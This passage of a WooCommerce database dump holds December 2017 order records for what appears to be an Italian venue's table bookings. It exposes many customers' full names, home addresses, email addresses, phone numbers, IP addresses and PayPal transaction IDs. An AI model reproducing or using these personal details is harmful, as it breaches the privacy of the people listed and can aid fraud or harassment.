0:{}'),(7017,244,'_download_limit','-1'),(7018,244,'_download_expiry','-1'),(7019,288,'_tax_status','taxable'),(7020,288,'_tax_class',''),(7021,288,'_default_attributes','a:0:{}'),(7022,288,'_download_limit','-1'),(7023,288,'_download_expiry','-1'),(7024,535,'_order_key','wc_order_5a22864ce2764'),(7025,535,'_customer_user','0'),(7026,535,'_payment_method','paypal'),(7027,535,'_payment_method_title','PayPal'),(7028,535,'_transaction_id',''),(7029,535,'_customer_ip_address','5.90.245.72'),(7030,535,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_1_2 like mac os x) applewebkit/604.3.5 (khtml, like gecko) version/11.0 mobile/15b202 safari/604.1'),(7031,535,'_created_via','checkout'),(7032,535,'_date_completed',''),(7033,535,'_completed_date',''),(7034,535,'_date_paid',''),(7035,535,'_paid_date',''),(7036,535,'_cart_hash','68efc55fbce80c20a5540766cf3bfac4'),(7037,535,'_billing_first_name','Sonia'),(7038,535,'_billing_last_name','Festini'),(7039,535,'_billing_company',''),(7040,535,'_billing_address_1','Loc Santa Firmina 113/2'),(7041,535,'_billing_address_2',''),(7042,535,'_billing_city','Arezzo'),(7043,535,'_billing_state',''),(7044,535,'_billing_postcode',''),(7045,535,'_billing_country',''),(7046,535,'_billing_email','soniafestini@virgilio.it'),(7047,535,'_billing_phone','3473014234'),(7048,535,'_shipping_first_name',''),(7049,535,'_shipping_last_name',''),(7050,535,'_shipping_company',''),(7051,535,'_shipping_address_1',''),(7052,535,'_shipping_address_2',''),(7053,535,'_shipping_city',''),(7054,535,'_shipping_state',''),(7055,535,'_shipping_postcode',''),(7056,535,'_shipping_country',''),(7057,535,'_order_currency','EUR'),(7058,535,'_cart_discount','0'),(7059,535,'_cart_discount_tax','0'),(7060,535,'_order_shipping','0'),(7061,535,'_order_shipping_tax','0'),(7062,535,'_order_tax','0'),(7063,535,'_order_total','120.00'),(7064,535,'_order_version','3.2.5'),(7065,535,'_prices_include_tax','no'),(7066,535,'_billing_address_index','Sonia Festini  Loc Santa Firmina 113/2  Arezzo    soniafestini@virgilio.it 3473014234'),(7067,535,'_shipping_address_index','        '),(7068,535,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(7069,535,'Numero bambini fino a 6 anni','0'),(7070,535,'Numero ragazzi fino a 13 anni','0'),(7071,535,'Files attached','[]'),(7072,536,'_order_key','wc_order_5a229fa0d6ed1'),(7073,536,'_customer_user','0'),(7074,536,'_payment_method','paypal'),(7075,536,'_payment_method_title','PayPal'),(7076,536,'_transaction_id','14U18850WK811950H'),(7077,536,'_customer_ip_address','151.38.146.67'),(7078,536,'_customer_user_agent','mozilla/5.0 (linux; android 7.0; sm-g930f build/nrd90m) applewebkit/537.36 (khtml, like gecko) chrome/62.0.3202.84 mobile safari/537.36'),(7079,536,'_created_via','checkout'),(7080,536,'_date_completed',''),(7081,536,'_completed_date',''),(7082,536,'_date_paid','1512218717'),(7083,536,'_paid_date','2017-12-02 13:45:17'),(7084,536,'_cart_hash','eb2f546241b6c4838ab167b9c05397c8'),(7085,536,'_billing_first_name','david'),(7086,536,'_billing_last_name','lazzari'),(7087,536,'_billing_company',''),(7088,536,'_billing_address_1','via pinturicchio 7'),(7089,536,'_billing_address_2',''),(7090,536,'_billing_city','TERNI'),(7091,536,'_billing_state',''),(7092,536,'_billing_postcode',''),(7093,536,'_billing_country',''),(7094,536,'_billing_email','alerogari@libero.it'),(7095,536,'_billing_phone','3280386183'),(7096,536,'_shipping_first_name',''),(7097,536,'_shipping_last_name',''),(7098,536,'_shipping_company',''),(7099,536,'_shipping_address_1',''),(7100,536,'_shipping_address_2',''),(7101,536,'_shipping_city',''),(7102,536,'_shipping_state',''),(7103,536,'_shipping_postcode',''),(7104,536,'_shipping_country',''),(7105,536,'_order_currency','EUR'),(7106,536,'_cart_discount','0'),(7107,536,'_cart_discount_tax','0'),(7108,536,'_order_shipping','0'),(7109,536,'_order_shipping_tax','0'),(7110,536,'_order_tax','0'),(7111,536,'_order_total','70.00'),(7112,536,'_order_version','3.2.5'),(7113,536,'_prices_include_tax','no'),(7114,536,'_billing_address_index','david lazzari  via pinturicchio 7  TERNI    alerogari@libero.it 3280386183'),(7115,536,'_shipping_address_index','        '),(7116,536,'Indicare in caso di prenotazione tavolo. Quanti adulti?','1'),(7117,536,'Numero bambini fino a 6 anni',''),(7118,536,'Numero ragazzi fino a 13 anni',''),(7119,536,'Files attached','[]'),(7120,536,'Payer PayPal address','alerogari@libero.it'),(7121,536,'Payer first name','david'),(7122,536,'Payer last name','lazzari'),(7123,536,'Payment type','instant'),(7124,536,'_paypal_status','completed'),(7125,536,'_download_permissions_granted','yes'),(7126,536,'_recorded_sales','yes'),(7127,536,'_recorded_coupon_usage_counts','yes'),(7128,536,'_order_stock_reduced','yes'),(7129,536,'PayPal Transaction Fee','2.73'),(7130,537,'_order_key','wc_order_5a23b13da32b9'),(7131,537,'_customer_user','14'),(7132,537,'_payment_method','paypal'),(7133,537,'_payment_method_title','PayPal'),(7134,537,'_transaction_id','66X11069PX253582U'),(7135,537,'_customer_ip_address','2.34.187.39'),(7136,537,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/62.0.3202.94 safari/537.36'),(7137,537,'_created_via','checkout'),(7138,537,'_date_completed',''),(7139,537,'_completed_date',''),(7140,537,'_date_paid','1512288707'),(7141,537,'_paid_date','2017-12-03 09:11:47'),(7142,537,'_cart_hash','7b6126373526c15218e6af306b33de17'),(7143,537,'_billing_first_name','leonardo'),(7144,537,'_billing_last_name','matricciani'),(7145,537,'_billing_company',''),(7146,537,'_billing_address_1','via san mauro 911'),(7147,537,'_billing_address_2',''),(7148,537,'_billing_city','cesena'),(7149,537,'_billing_state',''),(7150,537,'_billing_postcode',''),(7151,537,'_billing_country',''),(7152,537,'_billing_email','leomatrix@virgilio.it'),(7153,537,'_billing_phone','+393493133582'),(7154,537,'_shipping_first_name',''),(7155,537,'_shipping_last_name',''),(7156,537,'_shipping_company',''),(7157,537,'_shipping_address_1',''),(7158,537,'_shipping_address_2',''),(7159,537,'_shipping_city',''),(7160,537,'_shipping_state',''),(7161,537,'_shipping_postcode',''),(7162,537,'_shipping_country',''),(7163,537,'_order_currency','EUR'),(7164,537,'_cart_discount','0'),(7165,537,'_cart_discount_tax','0'),(7166,537,'_order_shipping','0'),(7167,537,'_order_shipping_tax','0'),(7168,537,'_order_tax','0'),(7169,537,'_order_total','60.00'),(7170,537,'_order_version','3.2.5'),(7171,537,'_prices_include_tax','no'),(7172,537,'_billing_address_index','leonardo matricciani  via san mauro 911  cesena    leomatrix@virgilio.it +393493133582'),(7173,537,'_shipping_address_index','        '),(7174,537,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(7175,537,'Numero bambini fino a 6 anni','0'),(7176,537,'Numero ragazzi fino a 13 anni','0'),(7177,537,'Files attached','[]'),(7178,537,'Payer PayPal address','leomatrix@virgilio.it'),(7179,537,'Payer first name','leonardo'),(7180,537,'Payer last name','matricciani'),(7181,537,'Payment type','instant'),(7182,537,'_paypal_status','completed'),(7183,537,'_download_permissions_granted','yes'),(7184,537,'_recorded_sales','yes'),(7185,537,'_recorded_coupon_usage_counts','yes'),(7186,537,'_order_stock_reduced','yes'),(7187,537,'PayPal Transaction Fee','2.39'),(7188,538,'_order_key','wc_order_5a23bb3548d5e'),(7189,538,'_customer_user','0'),(7190,538,'_payment_method','paypal'),(7191,538,'_payment_method_title','PayPal'),(7192,538,'_transaction_id','9YA10468HL561641J'),(7193,538,'_customer_ip_address','151.67.78.161'),(7194,538,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64; rv:57.0) gecko/20100101 firefox/57.0'),(7195,538,'_created_via','checkout'),(7196,538,'_date_completed',''),(7197,538,'_completed_date',''),(7198,538,'_date_paid','1512291271'),(7199,538,'_paid_date','2017-12-03 09:54:31'),(7200,538,'_cart_hash','7b6126373526c15218e6af306b33de17'),(7201,538,'_billing_first_name','Balugani'),(7202,538,'_billing_last_name','Balugani'),(7203,538,'_billing_company',''),(7204,538,'_billing_address_1','correggio 13'),(7205,538,'_billing_address_2',''),(7206,538,'_billing_city','Castelfranco E'),(7207,538,'_billing_state',''),(7208,538,'_billing_postcode',''),(7209,538,'_billing_country',''),(7210,538,'_billing_email','glucabalugani@gmail.com'),(7211,538,'_billing_phone','3294983967'),(7212,538,'_shipping_first_name',''),(7213,538,'_shipping_last_name',''),(7214,538,'_shipping_company',''),(7215,538,'_shipping_address_1',''),(7216,538,'_shipping_address_2',''),(7217,538,'_shipping_city',''),(7218,538,'_shipping_state',''),(7219,538,'_shipping_postcode',''),(7220,538,'_shipping_country',''),(7221,538,'_order_currency','EUR'),(7222,538,'_cart_discount','0'),(7223,538,'_cart_discount_tax','0'),(7224,538,'_order_shipping','0'),(7225,538,'_order_shipping_tax','0'),(7226,538,'_order_tax','0'),(7227,538,'_order_total','60.00'),(7228,538,'_order_version','3.2.5'),(7229,538,'_prices_include_tax','no'),(7230,538,'_billing_address_index','Balugani Balugani  correggio 13  Castelfranco E    glucabalugani@gmail.com 3294983967'),(7231,538,'_shipping_address_index','        '),(7232,538,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(7233,538,'Numero bambini fino a 6 anni','0'),(7234,538,'Numero ragazzi fino a 13 anni','0'),(7235,538,'Files attached','[]'),(7236,538,'Payer PayPal address','glucabalugani@gmail.com'),(7237,538,'Payer first name','Gianluca'),(7238,538,'Payer last name','Balugani'),(7239,538,'Payment type','instant'),(7240,538,'_paypal_status','completed'),(7241,538,'_download_permissions_granted','yes'),(7242,538,'_recorded_sales','yes'),(7243,538,'_recorded_coupon_usage_counts','yes'),(7244,538,'_order_stock_reduced','yes'),(7245,538,'PayPal Transaction Fee','2.39'),(7246,539,'_order_key','wc_order_5a23c7ff541ea'),(7247,539,'_customer_user','0'),(7248,539,'_payment_method','paypal'),(7249,539,'_payment_method_title','PayPal'),(7250,539,'_transaction_id','7J6927276R201044E'),(7251,539,'_customer_ip_address','5.90.13.186'),(7252,539,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_1_2 like mac os x) applewebkit/604.3.5 (khtml, like gecko) version/11.0 mobile/15b202 safari/604.1'),(7253,539,'_created_via','checkout'),(7254,539,'_date_completed',''),(7255,539,'_completed_date',''),(7256,539,'_date_paid','1512294626'),(7257,539,'_paid_date','2017-12-03 10:50:26'),(7258,539,'_cart_hash','7b6126373526c15218e6af306b33de17'),(7259,539,'_billing_first_name','valentina'),(7260,539,'_billing_last_name','Gambetta'),(7261,539,'_billing_company',''),(7262,539,'_billing_address_1',''),(7263,539,'_billing_address_2',''),(7264,539,'_billing_city',''),(7265,539,'_billing_state',''),(7266,539,'_billing_postcode',''),(7267,539,'_billing_country',''),(7268,539,'_billing_email','vgambetta@vetrog.it'),(7269,539,'_billing_phone','3457161084'),(7270,539,'_shipping_first_name',''),(7271,539,'_shipping_last_name',''),(7272,539,'_shipping_company',''),(7273,539,'_shipping_address_1',''),(7274,539,'_shipping_address_2',''),(7275,539,'_shipping_city',''),(7276,539,'_shipping_state',''),(7277,539,'_shipping_postcode',''),(7278,539,'_shipping_country',''),(7279,539,'_order_currency','EUR'),(7280,539,'_cart_discount','0'),(7281,539,'_cart_discount_tax','0'),(7282,539,'_order_shipping','0'),(7283,539,'_order_shipping_tax','0'),(7284,539,'_order_tax','0'),(7285,539,'_order_total','60.00'),(7286,539,'_order_version','3.2.5'),(7287,539,'_prices_include_tax','no'),(7288,539,'_billing_address_index','valentina Gambetta        vgambetta@vetrog.it 3457161084'),(7289,539,'_shipping_address_index','        '),(7290,539,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(7291,539,'Numero bambini fino a 6 anni','0'),(7292,539,'Numero ragazzi fino a 13 anni','0'),(7293,539,'Files attached','[]'),(7294,539,'Payer PayPal address','vgambetta@vetrog.it'),(7295,539,'Payer first name','valentina'),(7296,539,'Payer last name','Gambetta'),(7297,539,'Payment type','instant'),(7298,539,'_paypal_status','completed'),(7299,539,'_download_permissions_granted','yes'),(7300,539,'_recorded_sales','yes'),(7301,539,'_recorded_coupon_usage_counts','yes'),(7302,539,'_order_stock_reduced','yes'),(7303,539,'PayPal Transaction Fee','2.39'),(7304,540,'_order_key','wc_order_5a2511145fc82'),(7305,540,'_customer_user','0'),(7306,540,'_payment_method','paypal'),(7307,540,'_payment_method_title','PayPal'),(7308,540,'_transaction_id','0D314429GL377815G'),(7309,540,'_customer_ip_address','213.21.152.82'),(7310,540,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; wow64; trident/7.0; touch; rv:11.0) like gecko'),(7311,540,'_created_via','checkout'),(7312,540,'_date_completed',''),(7313,540,'_completed_date',''),(7314,540,'_date_paid','1512379012'),(7315,540,'_paid_date','2017-12-04 10:16:52'),(7316,540,'_cart_hash','68efc55fbce80c20a5540766cf3bfac4'),(7317,540,'_billing_first_name','Bruno'),(7318,540,'_billing_last_name','Pavoletti'),(7319,540,'_billing_company',''),(7320,540,'_billing_address_1','loc Santa Firmina 113/2'),(7321,540,'_billing_address_2',''),(7322,540,'_billing_city','arezzo'),(7323,540,'_billing_state',''),(7324,540,'_billing_postcode',''),(7325,540,'_billing_country',''),(7326,540,'_billing_email','bruno.pavoletti@studiolegalepavoletti.it'),(7327,540,'_billing_phone','3358149743'),(7328,540,'_shipping_first_name',''),(7329,540,'_shipping_last_name',''),(7330,540,'_shipping_company',''),(7331,540,'_shipping_address_1',''),(7332,540,'_shipping_address_2',''),(7333,540,'_shipping_city',''),(7334,540,'_shipping_state',''),(7335,540,'_shipping_postcode',''),(7336,540,'_shipping_country',''),(7337,540,'_order_currency','EUR'),(7338,540,'_cart_discount','0'),(7339,540,'_cart_discount_tax','0'),(7340,540,'_order_shipping','0'),(7341,540,'_order_shipping_tax','0'),(7342,540,'_order_tax','0'),(7343,540,'_order_total','120.00'),(7344,540,'_order_version','3.2.5'),(7345,540,'_prices_include_tax','no'),(7346,540,'_billing_address_index','Bruno Pavoletti  loc Santa Firmina 113/2  arezzo    bruno.pavoletti@studiolegalepavoletti.it 3358149743'),(7347,540,'_shipping_address_index','        '),(7348,540,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(7349,540,'Numero bambini fino a 6 anni','0'),(7350,540,'Numero ragazzi fino a 13 anni','0'),(7351,540,'Files attached','[]'),(7352,540,'Payer PayPal address','bruno.pavoletti@studiolegalepavoletti.it'),(7353,540,'Payer first name','Bruno'),(7354,540,'Payer last name','Pavoletti'),(7355,540,'Payment type','instant'),(7356,540,'_paypal_status','completed'),(7357,540,'_download_permissions_granted','yes'),(7358,540,'_recorded_sales','yes'),(7359,540,'_recorded_coupon_usage_counts','yes'),(7360,540,'_order_stock_reduced','yes'),(7361,540,'PayPal Transaction Fee','4.43'),(7362,541,'_order_currency','EUR'),(7363,541,'_cart_discount','0'),(7364,541,'_cart_discount_tax','0'),(7365,541,'_order_shipping','0'),(7366,541,'_order_shipping_tax','0'),(7367,541,'_order_tax','0'),(7368,541,'_order_total','-70.00'),(7369,541,'_order_version','3.2.5'),(7370,541,'_prices_include_tax','no'),(7371,541,'_refund_amount','70'),(7372,541,'_refunded_by','1'),(7373,541,'_refund_reason','Ordine completamente rimborsato'),(7374,542,'_order_key','wc_order_5a27a0b5412d4'),(7375,542,'_customer_user','0'),(7376,542,'_payment_method','paypal'),(7377,542,'_payment_method_title','PayPal'),(7378,542,'_transaction_id','96B79735AC306242T'),(7379,542,'_customer_ip_address','217.58.9.30'),(7380,542,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/62.0.3202.94 safari/537.36'),(7381,542,'_created_via','checkout'),(7382,542,'_date_completed',''),(7383,542,'_completed_date',''),(7384,542,'_date_paid','1512546576'),(7385,542,'_paid_date','2017-12-06 08:49:36'),(7386,542,'_cart_hash','1d9ddb2a530f0b09f1e0fe99aec70955'),(7387,542,'_billing_first_name','Alberto'),(7388,542,'_billing_last_name','Bricchi'),(7389,542,'_billing_company',''),(7390,542,'_billing_address_1','Via Bozzini 32'),(7391,542,'_billing_address_2',''),(7392,542,'_billing_city','Piacenza'),(7393,542,'_billing_state',''),(7394,542,'_billing_postcode',''),(7395,542,'_billing_country',''),(7396,542,'_billing_email','alberto.bricchi@gmail.com'),(7397,542,'_billing_phone','00393391609703'),(7398,542,'_shipping_first_name',''),(7399,542,'_shipping_last_name',''),(7400,542,'_shipping_company',''),(7401,542,'_shipping_address_1',''),(7402,542,'_shipping_address_2',''),(7403,542,'_shipping_city',''),(7404,542,'_shipping_state',''),(7405,542,'_shipping_postcode',''),(7406,542,'_shipping_country',''),(7407,542,'_order_currency','EUR'),(7408,542,'_cart_discount','0'),(7409,542,'_cart_discount_tax','0'),(7410,542,'_order_shipping','0'),(7411,542,'_order_shipping_tax','0'),(7412,542,'_order_tax','0'),(7413,542,'_order_total','180.00'),(7414,542,'_order_version','3.2.5'),(7415,542,'_prices_include_tax','no'),(7416,542,'_billing_address_index','Alberto Bricchi  Via Bozzini 32  Piacenza    alberto.bricchi@gmail.com 00393391609703'),(7417,542,'_shipping_address_index','        '),(7418,542,'Indicare in caso di prenotazione tavolo. Quanti adulti?','6'),(7419,542,'Numero bambini fino a 6 anni','0'),(7420,542,'Numero ragazzi fino a 13 anni','0'),(7421,542,'Files attached','[]'),(7422,542,'Payer PayPal address','alberto.bricchi@gmail.com'),(7423,542,'Payer first name','Alberto'),(7424,542,'Payer last name','Bricchi'),(7425,542,'Payment type','instant'),(7426,542,'_paypal_status','completed'),(7427,542,'_download_permissions_granted','yes'),(7428,542,'_recorded_sales','yes'),(7429,542,'_recorded_coupon_usage_counts','yes'),(7430,542,'_order_stock_reduced','yes'),(7431,542,'PayPal Transaction Fee','6.47'),(7432,543,'_order_key','wc_order_5a27a18760b52'),(7433,543,'_customer_user','0'),(7434,543,'_payment_method','paypal'),(7435,543,'_payment_method_title','PayPal'),(7436,543,'_transaction_id','9WG93912CC753764E'),(7437,543,'_customer_ip_address','217.58.9.30'),(7438,543,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/62.0.3202.94 safari/537.36'),(7439,543,'_created_via','checkout'),(7440,543,'_date_completed',''),(7441,543,'_completed_date',''),(7442,543,'_date_paid','1512546819'),(7443,543,'_paid_date','2017-12-06 08:53:39'),(7444,543,'_cart_hash','68efc55fbce80c20a5540766cf3bfac4'),(7445,543,'_billing_first_name','Alberto'),(7446,543,'_billing_last_name','Bricchi'),(7447,543,'_billing_company',''),(7448,543,'_billing_address_1','Via Bozzini 32'),(7449,543,'_billing_address_2',''),(7450,543,'_billing_city','Piacenza'),(7451,543,'_billing_state',''),(7452,543,'_billing_postcode',''),(7453,543,'_billing_country',''),(7454,543,'_billing_email','alberto.bricchi@gmail.com'),(7455,543,'_billing_phone','00393391609703'),(7456,543,'_shipping_first_name',''),(7457,543,'_shipping_last_name',''),(7458,543,'_shipping_company',''),(7459,543,'_shipping_address_1',''),(7460,543,'_shipping_address_2',''),(7461,543,'_shipping_city',''),(7462,543,'_shipping_state',''),(7463,543,'_shipping_postcode',''),(7464,543,'_shipping_country',''),(7465,543,'_order_currency','EUR'),(7466,543,'_cart_discount','0'),(7467,543,'_cart_discount_tax','0'),(7468,543,'_order_shipping','0'),(7469,543,'_order_shipping_tax','0'),(7470,543,'_order_tax','0'),(7471,543,'_order_total','120.00'),(7472,543,'_order_version','3.2.5'),(7473,543,'_prices_include_tax','no'),(7474,543,'_billing_address_index','Alberto Bricchi  Via Bozzini 32  Piacenza    alberto.bricchi@gmail.com 00393391609703'),(7475,543,'_shipping_address_index','        '),(7476,543,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(7477,543,'Numero bambini fino a 6 anni','0'),(7478,543,'Numero ragazzi fino a 13 anni','0'),(7479,543,'Files attached','[]'),(7480,543,'Payer PayPal address','alberto.bricchi@gmail.com'),(7481,543,'Payer first name','Alberto'),(7482,543,'Payer last name','Bricchi'),(7483,543,'Payment type','instant'),(7484,543,'_paypal_status','completed'),(7485,543,'_download_permissions_granted','yes'),(7486,543,'_recorded_sales','yes'),(7487,543,'_recorded_coupon_usage_counts','yes'),(7488,543,'_order_stock_reduced','yes'),(7489,543,'PayPal Transaction Fee','4.43'),(7490,544,'_order_key','wc_order_5a29912df2ab2'),(7491,544,'_customer_user','0'),(7492,544,'_payment_method','paypal'),(7493,544,'_payment_method_title','PayPal'),(7494,544,'_transaction_id','1FA60386PM078553C'),(7495,544,'_customer_ip_address','93.44.82.52'),(7496,544,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_12_6) applewebkit/604.3.5 (khtml, like gecko) version/11.0.1 safari/604.3.5'),(7497,544,'_created_via','checkout'),(7498,544,'_date_completed',''),(7499,544,'_completed_date',''),(7500,544,'_date_paid','1512673714'),(7501,544,'_paid_date','2017-12-07 20:08:34'),(7502,544,'_cart_hash','7b6126373526c15218e6af306b33de17'),(7503,544,'_billing_first_name','Claudio'),(7504,544,'_billing_last_name','Barberini'),(7505,544,'_billing_company',''),(7506,544,'_billing_address_1','Via Cervino 30'),(7507,544,'_billing_address_2',''),(7508,544,'_billing_city','Modena'),(7509,544,'_billing_state',''),(7510,544,'_billing_postcode',''),(7511,544,'_billing_country',''),(7512,544,'_billing_email','claudio58.barberini@gmail.com'),(7513,544,'_billing_phone','3385040008'),(7514,544,'_shipping_first_name',''),(7515,544,'_shipping_last_name',''),(7516,544,'_shipping_company',''),(7517,544,'_shipping_address_1',''),(7518,544,'_shipping_address_2',''),(7519,544,'_shipping_city',''),(7520,544,'_shipping_state',''),(7521,544,'_shipping_postcode',''),(7522,544,'_shipping_country',''),(7523,544,'_order_currency','EUR'),(7524,544,'_cart_discount','0'),(7525,544,'_cart_discount_tax','0'),(7526,544,'_order_shipping','0'),(7527,544,'_order_shipping_tax','0'),(7528,544,'_order_tax','0'),(7529,544,'_order_total','60.00'),(7530,544,'_order_version','3.2.5'),(7531,544,'_prices_include_tax','no'),(7532,544,'_billing_address_index','Claudio Barberini  Via Cervino 30  Modena    claudio58.barberini@gmail.com 3385040008'),(7533,544,'_shipping_address_index','        '),(7534,544,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(7535,544,'Numero bambini fino a 6 anni','0'),(7536,544,'Numero ragazzi fino a 13 anni','0'),(7537,544,'Files attached','[]'),(7538,544,'Payer PayPal address','claudio58.barberini@gmail.com'),(7539,544,'Payer first name','Claudio'),(7540,544,'Payer last name','Barberini'),(7541,544,'Payment type','instant'),(7542,544,'_paypal_status','completed'),(7543,544,'_download_permissions_granted','yes'),(7544,544,'_recorded_sales','yes'),(7545,544,'_recorded_coupon_usage_counts','yes'),(7546,544,'_order_stock_reduced','yes'),(7547,544,'PayPal Transaction Fee','2.39'),(7548,545,'_order_key','wc_order_5a2c1e402767f'),(7549,545,'_customer_user','0'),(7550,545,'_payment_method','paypal'),(7551,545,'_payment_method_title','PayPal'),(7552,545,'_transaction_id','3WJ823218H133193A'),(7553,545,'_customer_ip_address','95.250.172.146'),(7554,545,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_11_6) applewebkit/604.3.5 (khtml, like gecko) version/11.0.1 safari/604.3.5'),(7555,545,'_created_via','checkout'),(7556,545,'_date_completed',''),(7557,545,'_completed_date',''),(7558,545,'_date_paid','1512840795'),(7559,545,'_paid_date','2017-12-09 18:33:15'),(7560,545,'_cart_hash','68efc55fbce80c20a5540766cf3bfac4'),(7561,545,'_billing_first_name','michelangelo'),(7562,545,'_billing_last_name','galliani'),(7563,545,'_billing_company',''),(7564,545,'_billing_address_1','via masdoni 4'),(7565,545,'_billing_address_2',''),(7566,545,'_billing_city','montecchio emilia RE'),(7567,545,'_billing_state',''),(7568,545,'_billing_postcode',''),(7569,545,'_billing_country',''),(7570,545,'_billing_email','michelangelogalliani@gmail.com'),(7571,545,'_billing_phone','3923050911'),(7572,545,'_shipping_first_name',''),(7573,545,'_shipping_last_name',''),(7574,545,'_shipping_company',''),(7575,545,'_shipping_address_1',''),(7576,545,'_shipping_address_2',''),(7577,545,'_shipping_city',''),(7578,545,'_shipping_state',''),(7579,545,'_shipping_postcode',''),(7580,545,'_shipping_country',''),(7581,545,'_order_currency','EUR'),(7582,545,'_cart_discount','0'),(7583,545,'_cart_discount_tax','0'),(7584,545,'_order_shipping','0'),(7585,545,'_order_shipping_tax','0'),(7586,545,'_order_tax','0'),(7587,545,'_order_total','120.00'),(7588,545,'_order_version','3.2.5'),(7589,545,'_prices_include_tax','no'),(7590,545,'_billing_address_index','michelangelo galliani  via masdoni 4  montecchio emilia RE    michelangelogalliani@gmail.com 3923050911'),(7591,545,'_shipping_address_index','        '),(7592,545,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(7593,545,'Numero bambini fino a 6 anni','0'),(7594,545,'Numero ragazzi fino a 13 anni','0'),(7595,545,'Files attached','[]'),(7596,545,'Payer PayPal address','michelangelogalliani@gmail.com'),(7597,545,'Payer first name','Michelangelo'),(7598,545,'Payer last name','Galliani'),(7599,545,'Payment type','instant'),(7600,545,'_paypal_status','completed'),(7601,545,'_download_permissions_granted','yes'),(7602,545,'_recorded_sales','yes'),(7603,545,'_recorded_coupon_usage_counts','yes'),(7604,545,'_order_stock_reduced','yes'),(7605,545,'PayPal Transaction Fee','4.43'),(7606,546,'_order_key','wc_order_5a2c605eac5e2'),(7607,546,'_customer_user','0'),(7608,546,'_payment_method','paypal'),(7609,546,'_payment_method_title','PayPal'),(7610,546,'_transaction_id','9UE94165TC883364E'),(7611,546,'_customer_ip_address','95.251.57.153'),(7612,546,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/62.0.3202.94 safari/537.36'),(7613,546,'_created_via','checkout'),(7614,546,'_date_completed',''),(7615,546,'_completed_date',''),(7616,546,'_date_paid','1512857899'),(7617,546,'_paid_date','2017-12-09 23:18:19'),(7618,546,'_cart_hash','68efc55fbce80c20a5540766cf3bfac4'),(7619,546,'_billing_first_name','Poggetti Francesco'),(7620,546,'_billing_last_name','Poggetti'),(7621,546,'_billing_company',''),(7622,546,'_billing_address_1','Viale Vittorio Veneto 6/A'),(7623,546,'_billing_address_2',''),(7624,546,'_billing_city','Correggio'),(7625,546,'_billing_state',''),(7626,546,'_billing_postcode',''),(7627,546,'_billing_country',''),(7628,546,'_billing_email','poio0205@gmail.com'),(7629,546,'_billing_phone','3396235022'),(7630,546,'_shipping_first_name',''),(7631,546,'_shipping_last_name',''),(7632,546,'_shipping_company',''),(7633,546,'_shipping_address_1',''),(7634,546,'_shipping_address_2',''),(7635,546,'_shipping_city',''),(7636,546,'_shipping_state',''),(7637,546,'_shipping_postcode',''),(7638,546,'_shipping_country',''),(7639,546,'_order_currency','EUR'),(7640,546,'_cart_discount','0'),(7641,546,'_cart_discount_tax','0'),(7642,546,'_order_shipping','0'),(7643,546,'_order_shipping_tax','0'),(7644,546,'_order_tax','0'),(7645,546,'_order_total','120.00'),(7646,546,'_order_version','3.2.6'),(7647,546,'_prices_include_tax','no'),(7648,546,'_billing_address_index','Poggetti Francesco Poggetti  Viale Vittorio Veneto 6/A  Correggio    poio0205@gmail.com 3396235022'),(7649,546,'_shipping_address_index','        '),(7650,546,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(7651,546,'Numero bambini fino a 6 anni','0'),(7652,546,'Numero ragazzi fino a 13 anni','0'),(7653,546,'Files attached','[]'),(7654,546,'Payer PayPal address','poio0205@gmail.com'),(7655,546,'Payer first name','Poggetti Francesco'),(7656,546,'Payer last name','Poggetti'),(7657,546,'Payment type','instant'),(7658,546,'_paypal_status','completed'),(7659,546,'_download_permissions_granted','yes'),(7660,546,'_recorded_sales','yes'),(7661,546,'_recorded_coupon_usage_counts','yes'),(7662,546,'_order_stock_reduced','yes'),(7663,546,'PayPal Transaction Fee','4.43'),(7664,548,'_wc_review_count','0'),(7665,548,'_wc_rating_count','a:0:{}'),(7666,548,'_wc_average_rating','0'),(7667,548,'_edit_lock','1544818592:1'),(7668,548,'_edit_last','1'),(7669,548,'_thumbnail_id','551'),(7670,548,'_sku','coupon'),(7671,548,'_regular_price','25'),(7672,548,'_sale_price',''),(7673,548,'_sale_price_dates_from',''),(7674,548,'_sale_price_dates_to',''),(7675,548,'total_sales','50'),(7676,548,'_tax_status','taxable'),(7677,548,'_tax_class',''),(7678,548,'_manage_stock','no'),(7679,548,'_backorders','no'),(7680,548,'_sold_individually','no'),(7681,548,'_weight',''),(7682,548,'_length',''),(7683,548,'_width',''),(7684,548,'_height',''),(7685,548,'_upsell_ids','a:0:{}'),(7686,548,'_crosssell_ids','a:0:{}'),(7687,548,'_purchase_note','Validità 6 mesi dal momento 